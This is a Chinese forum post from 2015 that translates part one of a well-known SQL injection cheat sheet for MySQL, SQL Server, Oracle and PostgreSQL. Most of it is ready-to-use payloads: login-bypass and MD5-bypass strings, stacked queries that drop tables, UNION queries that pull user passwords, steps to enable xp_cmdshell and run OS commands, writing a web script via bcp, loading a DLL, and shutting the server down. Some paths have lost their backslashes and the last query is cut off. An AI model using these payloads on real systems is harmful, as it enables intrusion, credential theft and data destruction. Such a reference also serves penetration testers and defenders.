a.hsuan

U途骑士

UID16240
粉丝1
关注0
发帖数1
铜币12枚
威望12点
贡献0点

加关注写私信

阅读：3591回复：0

SQL注入速查表（上）

楼主^#

更多发布于：2015-09-08 13:54

oracle 数据库小技巧 microsoft potential

本文由Yinzo翻译，转载请保留署名。原文地址：http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/#Enablecmdshell

文档版本：1.4

◆0 关于SQL注入速查表

现在仅支持MySQL、Microsoft SQL Server，以及一部分ORACLE和PostgreSQL。大部分样例都不能保证每一个场景都适用。现实场景由于各种插入语、不同的代码环境以及各种不常见甚至奇特的SQL语句，而经常发生变化。

样例仅用于读者理解对于“可能出现的攻击(a potential attack)”的基础概念，并且几乎每一个部分都有一段简洁的概要

例子：

◆1 目录

[*]行内注释

[*]堆叠查询(Stacking Queries)

[*]If语句

[*]整数(Integers)的使用
[*]字符串操作

[*]没有引号的字符串

[*]字符串异化(Modification)与联系
[*]Union注入

[*]绕过登陆界面(SMO+)
[*]绕过检查MD5哈希的登陆界面

[*]基于错误(Error Based)-探测字段名

[*]数据类型、UNION、之类的

[*]简单的注入(MSO+)
[*]有用的函数、信息收集、内置程序、大量注入笔记

[*]在SQL Server 2005中启用xp_cmdshell
[*]探测SQL Server数据库的结构(S)

[*]移动记录(Moving records)(S)
[*]快速的脱掉基于错误(Error Based)的SQL Server注入(S)

◆2 语法参考，攻击样例以及注入小技巧

行间注释

注释掉查询语句的其余部分

行间注释通常用于注释掉查询语句的其余部分，这样你就不需要去修复整句语法了。

使用了行间注释的SQL注入攻击样例

用户名:admin'--

行内注释

通过不关闭注释注释掉查询语句的其余部分，或者用于绕过过滤，移除空格，混淆，或探测数据库版本。

使用了行内注释的注入攻击样例

ID:10; DROP TABLE members /*

简单地摆脱了处理后续语句的麻烦，同样你可以使用10; DROP TABLE members --

MySQL版本探测攻击样例

SELECT /*!32302 1/0, */ 1 FROM tablename

如果MySQL的版本高于3.23.02，会抛出一个division by 0 error

ID:/*!32302 10*/
ID:10

如果MySQL版本高于3.23.02，以上两次查询你将得到相同的结果

堆叠查询(Stacking Queries)

一句代码之中执行多个查询语句，这在每一个注入点都非常有用，尤其是使用SQL Server后端的应用

支持堆叠查询的语言/数据库

绿色：支持，暗灰色：不支持，浅灰色：未知

图片：2015081902360042624.jpg

关于MySQL和PHP

阐明一些问题。

PHP-MySQL不支持堆叠查询，Java不支持堆叠查询（ORACLE的我很清楚，其他的就不确定了）。一般来说MySQL支持堆叠查询，但由于大多数PHP-Mysql应用框架的数据库层都不能执行第二条查询，或许MySQL的客户端支持这个，我不确定，有人能确认一下吗？

（译者注：MySQL 5.6.20版本下客户端支持堆叠查询）

堆叠注入攻击样例

ID:10;DROP members --

构成语句：SELECT * FROM products WHERE id = 10; DROP members--

这在执行完正常查询之后将会执行DROP查询。

If语句

根据If语句得到响应。这是盲注(Blind SQL Injection)的关键之一，同样也能简单而准确地进行一些测试。

MySQL的If语句

SELECT IF (1=1,'true','false')

SQL Server的If语句

IF (1=1) SELECT 'true' ELSE SELECT 'false'

使用了If语句的注入攻击样例

if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0(S)

如果当前用户不是"sa"或者"dbo",就会抛出一个divide by zero error。

整数(Integers)的使用

对于绕过十分有用，比如magic_quotes() 和其他类似过滤器，甚至是各种WAF。

字符串操作

与字符串相关的操作。这对于构造一个不含有引号，用于绕过或探测数据库都非常的有用。

字符串的串联

*关于MySQL的"||" 这个仅在ANSI模式下的MySQL执行，其他情况下都会当成'逻辑操作符'并返回一个0。更好的做法是使用CONCAT()函数。

没有引号的字符串

有很多使用字符串的方法，但是这几个方法是一直可用的。使用CHAR()(MS)和CONCAT()(M)来生成没有引号的字符串

使用了16进制的注入攻击样例

c:boot.ini

字符串异化(Modification)与联系

Union注入

通过union你能跨表执行查询。最简单的，你能注入一个查询使得它返回另一个表的内容。 SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members

这会把news表和members表的内容合并返回。

另一个例子： ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

UNION-语言问题处理

当你使用Union来注入的时候，经常会遇到一些错误，这是由于不同的语言的设置（表的设置、字段设置、表或数据库的设置等等）。这些办法对于解决那些问题都挺有用的，尤其是当你处理日文，俄文，土耳其文的时候你会就会见到他们的。

绕过登陆界面(SMO+)

SQL注入101式(大概是原文名字吧？),登陆小技巧

**旧版本的MySQL不支持union*

绕过检查MD5哈希的登陆界面

如果应用是先通过用户名，读取密码的MD5，然后和你提供的密码的MD5进行比较，那么你就需要一些额外的技巧才能绕过验证。你可以把一个已知明文的MD5哈希和它的明文一起提交，使得程序不使用从数据库中读取的哈希，而使用你提供的哈希进行比较。

绕过MD5哈希检查的例子(MSP)

用户名：admin
密码：1234 ' AND 1=0 UNION ALL SELECT 'admin','81dc9bdb52d04dc20036dbd8313ed055

其中81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)

基于错误(Error Based)-探测字段名

使用HAVING来探测字段名(S)

在SELECT查询中使用ORDER BY探测字段数(MSO+)

通过ORDER BY来探测字段数能够加快union注入的速度。

数据类型、UNION、之类的

提示：

UNION

ALL

获取字段类型

数字类型

你在遇到union错误之前会先遇到convert()错误，所以先使用convert()再用union

简单的注入(MSO+)

'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*

有用的函数、信息收集、内置程序、大量注入笔记

@@version(MS)

数据库的版本。这是个常量，你能把它当做字段来SELECT，而且不需要提供表名。同样的你也可以用在INSERT/UPDATE语句里面，甚至是函数里面。

INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)

文件插入(Bulk Insert)(S)

把文件内容插入到表中。如果你不知道应用目录你可以去读取IIS metabase file(仅IIS 6)(%systemroot%system32inetsrvMetaBase.xml)然后在里面找到应用目录。

BCP(S)

写入文件。这个功能需要登录 bcp "SELECT * FROM test..foo" queryout c:inetpubwwwrootruncommand.asp -c -Slocalhost -Usa -Pfoobar

SQL Server的VBS/WSH(S)

由于ActiveX的支持，你能在SQL Server中使用VBS/WSH

declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'

Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --

执行系统命令，xp_cmdshell(S)

众所周知的技巧，SQL Server 2005默认是关闭的。你需要admin权限

EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'

用ping简单的测试一下，用之前先检查一下防火墙和嗅探器。

EXEC master.dbo.xp_cmdshell 'ping '

如果有错误，或者union或者其他的什么，你都不能直接读到结果。

SQL Server中的一些特殊的表(S)

SQL Server的其它内置程序(S)

[*]管理服务(xp_servicecontrol)

[*]媒体(xp_availablemedia)

[*]ODBC 资源 (xp_enumdsn)

[*]登录 (xp_loginconfig)
[*]创建Cab文件 (xp_makecab)
[*]域名列举 (xp_ntsec_enumdomains)
[*]杀进程 (need PID) (xp_terminate_process)
[*]新建进程 (实际上你想干嘛都行)

sp_addextendedproc ‘xp_webserver’, ‘c:tempx.dll’
exec xp_webserver

[*]写文件进UNC或者内部路径 (sp_makewebtask)

大量MSSQL笔记

SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/

DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0

HOST_NAME() IS_MEMBER (Transact-SQL)

IS_SRVROLEMEMBER (Transact-SQL)

OPENDATASOURCE (Transact-SQL)

INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"

OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx

你不能在 SQL Server 的Insert查询里使用子查询(sub select).

使用LIMIT(M)或ORDER(MSO)的注入

SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;

如果注入点在LIMIT的第二个参数处，你可以把它注释掉或者使用union注入。

关掉SQL Server(S)

如果你真的急了眼，';shutdown --

在SQL Server 2005中启用xp_cmdshell

默认情况下，SQL Server 2005中像xp_cmdshell以及其它危险的内置程序都是被禁用的。如果你有admin权限，你就可以启动它们。

` EXEC sp_configure 'show advanced options',1 RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1 RECONFIGURE `

探测SQL Server数据库的结构(S)

获取用户定义表

SELECT name FROM sysobjects WHERE xtype = 'U'

获取字段名

SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')

移动记录(Moving records)(S)

<ul>
修改WHERE，使用NOT IN或者NOT EXIST ... WHERE users NOT IN ('First User', 'Second User') SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members) -- 这个好用

脏的不行的小技巧

SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id

喜欢1 评分0

发帖回复

« 返回列表

您需要登录后才可以回帖，登录或者注册

返回顶部

SQL注入速查表（上）

最新喜欢：